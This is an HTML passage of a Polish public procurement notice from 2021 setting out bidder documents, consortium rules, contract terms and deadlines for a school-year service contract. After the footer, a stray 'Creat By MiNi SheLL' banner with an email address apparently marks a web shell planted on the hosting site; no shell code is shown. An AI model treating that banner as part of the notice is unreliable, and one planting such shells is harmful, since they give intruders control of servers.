warunków udziału w postępowaniu: <span class="normal">Zamawiający w celu potwierdzenia spełnienia warunków udziału w<br/>postępowaniu, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia tj. (art. 274 ust. 1 ustawy Pzp):<br/>2.1. Odpowiedniego zezwolenia, licencji koncesji lub wpisu do rejestru działalności regulowanej, a<br/>także dokumentu potwierdzającego status członka danej organizacji, jeżeli członkostwo w tej<br/>organizacji jest niezbędne do świadczenia usług w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ten/<br/>dokumenty te składa przynajmniej jeden z Wykonawców.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć następujące dokumenty:<br/>1. Wypełniony i podpisany FORMULARZ OFERTY<br/>- którego wzór stanowi załącznik nr 1 do SWZ.<br/>2. OŚWIADCZENIE WSTĘPNE (art. 125 ust 1 ustawy Pzp),<br/>- załącznik nr 2 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 13 ust. 2<br/>SWZ<br/>- załącznik nr 3 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 14 ust. 1 i<br/>Rozdziale 15 ust 1 SWZ.<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik.<br/>3. ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>- wzór zobowiązania stanowi załącznik nr 4 do SWZ.<br/>4. OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZELENIE<br/>ZAMÓWIENIA (konsorcjum, spółka cywilna itp.)<br/>- wzór oświadczenia stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/>Uwaga: Oświadczenie ma być złożone wraz z ofertą (jeżeli dotyczy). Oświadczenie ma być<br/>podpisane przez każdego z wykonawców występujących wspólnie.<br/>5. PEŁNOMOCNICTWA<br/>Mają być złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy):<br/>a) w przypadku podpisania oferty przez osoby nie wymienione w odpisie z właściwego rejestru -<br/>pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy<br/>b) w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez<br/>upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do<br/>reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>- pełnomocnictwo może być sporządzone wg. wzoru stanowiącego załącznik nr 5 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Zasady składania oferty przez podmioty występujące wspólnie:<br/>5.1 Wymagane oświadczenia wskazane w pkt. 3.1 niniejszego Rozdziału SWZ powinny być<br/>złożone przez każdego wykonawcę wspólnie ubiegającego się o zamówienie 5.2 W przypadku,<br/>o którym mowa w art. 117 ust. 2 i 3 stawy Pzp, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna itp.) dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp) - wzór oświadczenia stanowi załącznik nr<br/>6 do SWZ.<br/>5.3 Wykonawcy składający ofertę wspólną zobowiązani są do ustanowienia Pełnomocnika do<br/>reprezentowania ich w postępowaniu albo Pełnomocnika do reprezentowania ich w<br/>postępowaniu oraz do zawarcia umowy w sprawie zamówienia - patrz: pkt. 3.4 ppkt b) SWZ.<br/>Dokument lub dokumenty zawierający ustanowienie Pełnomocnika (wzór pełnomocnictwa<br/>stanowi załącznik nr 5 do SWZ) musi zawierać w szczególności: wskazanie postępowania o<br/>zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, wskazanie ustanowionego Pełnomocnika i zakres jego umocowania. Dokument<br/>(lub dokumenty) zawierający ustanowienie Pełnomocnika musi być podpisany w imieniu<br/>wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, przez osoby<br/>uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub ewidencji<br/>wykonawców. Ustanowienie przedmiotowego Pełnomocnika może zostać zawarte w umowie o<br/>współdziałaniu złożonej wraz z ofertą. Dokument (lub dokumenty) zawierający ustanowienie<br/>Pełnomocnika musi zostać złożony wraz z ofertą w formie oryginału lub notarialnie poświadczonej kopii. Do dokumentu (lub dokumentów) zawierającego ustanowienie<br/>Pełnomocnika należy załączyć dokumenty potwierdzające, że osoba udzielająca<br/>pełnomocnictwa była upoważniona do reprezentowania wykonawców w chwili udzielania<br/>pełnomocnictwa (co można wykazać<br/>w szczególności przez załączenie odpisu z Krajowego<br/>Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru<br/>Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o<br/>Krajowym Rejestrze Sadowym (tj. Dz. U. z 2007 r. Nr 168, poz.1186, ze zm.) albo<br/>zaświadczenie o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>zgodnie z art. 46 ustawy z dnia 6 marca 2018 r. o Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej i Punkcie Informacji dla Przedsiębiorcy (Dz.U.2020.2296). Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniana przez upełnomocnionego.<br/>5.4 Oferta wspólna składana przez dwóch lub więcej wykonawców, powinna spełniać<br/>następujące wymagania:<br/>a) Dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw<br/>wykluczenia, składa każdy z wykonawców składających ofertę wspólną we własnym imieniu.<br/>b) Dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe<br/>składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę<br/>wspólną.<br/>5.5 Wykonawca, który powołuje się na zasoby innych podmiotów, o których mowa w Rozdziale<br/>24 ust. 3 pkt 3.2 SWZ, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz<br/>spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu,<br/>składa oświadczenia wskazane w Rozdziale 24 ust 3, pkt. 3.1. SWZ zawierające informacje<br/>dotyczące tych podmiotów.<br/>5.6 Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem.<br/>5.7 Wypełniając formularz oferty, jak również inne dokumenty, powołując się na wykonawcę, w<br/>miejscu np. nazwa i adres wykonawcy, należy wpisać dane dotyczące wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia , zawiera Wzór umowy (z<br/>załącznikami), który stanowi załącznik nr 7 do SWZ (paragraf 15 Projektu Umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-02 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-02 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin rozpoczęcia realizacji świadczenia usługi: od dnia rozpoczęcia zajęć szkolnych w roku<br/>2021 , tj. 01.09.2021r.<br/>Termin zakończenia realizacji świadczenia usługi: do dnia zakończenia zajęć szkolnych w roku<br/>2022, tj. 24.06.2022 r.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com